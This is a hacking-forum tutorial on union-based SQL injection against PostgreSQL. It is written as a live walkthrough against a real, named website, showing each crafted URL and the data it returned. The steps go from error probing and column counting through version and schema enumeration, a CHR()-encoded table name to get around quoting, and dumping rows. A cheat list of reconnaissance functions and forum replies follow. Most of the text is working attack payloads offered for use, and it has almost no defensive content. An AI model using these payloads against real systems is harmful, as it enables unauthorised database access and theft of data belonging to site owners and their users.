PostgreSQL Union Injection - Quick Guide

[denjacker]

Short Introduction For PostgreSQL.

PostgreSQL, often simply Postgres, is an object-relational database management system (ORDBMS).

It is released under an MIT-style license and is thus free and open source software . Version 7.x to 9.0 is latest.

Note: before I proceed further I would like to tell my reader (begnners) Injection does not mean that Back end

DB is vuln , that's cause by bad code of web developer and does not validate the input .

Step-1: Getting Start with Union Based:

Every db uses same principle to pull data out of db ofcourse it is select using apropriate column names.

Im not goin to explain about select cause every1 know about it .

Step-2: Checking Target For Vunl .

http://www.crookedtree.org/index.php?catid=583'

an error has occured with the database!SELECT    *
            FROM     bus_category    
            WHERE    id = 583\'

Errors MYSQL with MYSQL or MS SQL with SQL or ORACLE with ORA or MS ACCESS with Jet and

Warning: pg_exec () [function.pg-exec] <== PostgreSQL OR error like above.

Step-3: Getting Number Of Columns

For Getting columns we use same method used in other db order by we use -- or # for comments .

http://www.crookedtree.org/index.php?catid=583 order by 1-- <== no error
http://www.crookedtree.org/index.php?catid=583 order by 2-- <== no error
http://www.crookedtree.org/index.php?catid=583 order by 3-- <== no error
http://www.crookedtree.org/index.php?catid=583 order by 4-- <== no error

We will do increament of 1 till get an error and we have error on 14th column.

That mean we have 13th columns (error_column_num - 1) = 13th .

An other Method is executing query with union and get to the column I.E

http://www.crookedtree.org/index.php?catid=-583 union select null-- <== error
http://www.crookedtree.org/index.php?catid=-583 union select null,null-- <== error
http://www.crookedtree.org/index.php?catid=-583 union select null,null,null-- <== error

We will keep adding null till we get a blank page or site loaded . This method is really anoying Big Grin .

Step-4: Getting Data for the visble Column.

The term most of the ppl use is vuln column . Same like Oracle injection we will use Null data type for columns.

Question is why????? Because we does not know about the datatype so using null datatype will do the trick for us.

and ofcourse some site does have interger value so it will be use as vise versa.

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,null,null,null,null,null,
null,null,null,null,null--

Now can see page loaded with out error (some time loaded but content missing as in this site) .

Now what but can not see any coulmn print on screen . Lets procceed with interger value but 0 .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,null,null,null,null,null,null,null,null,null,null,null,null-- <== no error
http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,null,null,null,null,null,null,null,null,null,null-- <== no error
http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0,null,null,null,null,null,null,null,null,null,null-- <== error
http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,0,null,null,null,null,null,null,null,null,null-- <== error

Will keep replacing null with interget value "0" untill get an error . Wow we have an error on 3rd and 4th columns, there are other columns well but we stop here and move to next step.

This what we are looking for .

Step-5: Getting DB Version

Now our query will be same as with null except 4th column , will replace it with version .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,version(),null,null,null,null,null,null,null,null,null--

PostgreSQL 8.2.9 on x86_64-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4)

Now have got the db version Big Grin .

Step-6: Getting Other DBz and Table Schema

Im goin to check if this target having other db or not

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database--

AAA <== db

we only see one database at a time, Now what to do hmmm how about using limit to get others Big Grin .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database LIMIT 1 OFFSET 1--

LIMIT 1 OFFSET 1 <== OFFSET value. If we keep changing this value then we will get next db Big Grin like 1 2 3.... .

I will explain this how to use other db for injection in an other tutz . Now we will move to our injection.

Step-6.1: Now Getting Table Schema.

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES--

addbook

Bad thing is cant concat hehehe aah so what to do now . We will have to use limit . Ive already explain

how to use it .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES limit 1 offset 3--

artist_entry

OR Table From Current DB Schema

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES where table_schema=current_schema()
limit 1 offset 0--

addbook

Just keep increasing the value and you will see next table .

Step-7: Getting Columns Of Schema

Now lets proceed with column enumeration.

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns

abbrev

Getting columns for schema , again same one at a time , we will use limit here.

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns limit 1 offset 1--

access_date

Step-7.1 Getting Columns for Particular Table for Current DB Schema

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where
table_name=addbook--

What is wrong with this query ??? aah an error Big Grin . Remember mysql why we have to convert table name into char

Im not goin to exlaining it here . But here senerio is little different for concat

char we will use " || " pipe sign . We are using table name "addbook"

We will convert our table name with oracle char , using hackbar addon . select table name and

SQL--->ORACLE--->ORACLE CHAR() .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,
column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107)--

add1

Again to get other columns we will have to use limit Big Grin .

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107) limit 1 offset 3--

city

Step-8: Getting Data From Coulmn

http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,city,null,null,null,null,null,null,null,null,null from addbook limit 1 offset 1--

Alanson

Thats All folks Smile . Hope you have enjoyed it Smile . Post your valuable comments .

Quick Cheat List:

current_database()
current_schema()
current_user
inet_client_addr()
inet_client_port()
inet_server_addr()
inet_server_port()
pg_my_temp_schema()
pg_postmaster_start_time()
session_user
user
version()
getpgusername()

Special Thanks to : N3T.CrAck3R , Sho0ter , Renorobert, NetSpy

[scorpy0n]

ms de tutorial

+rep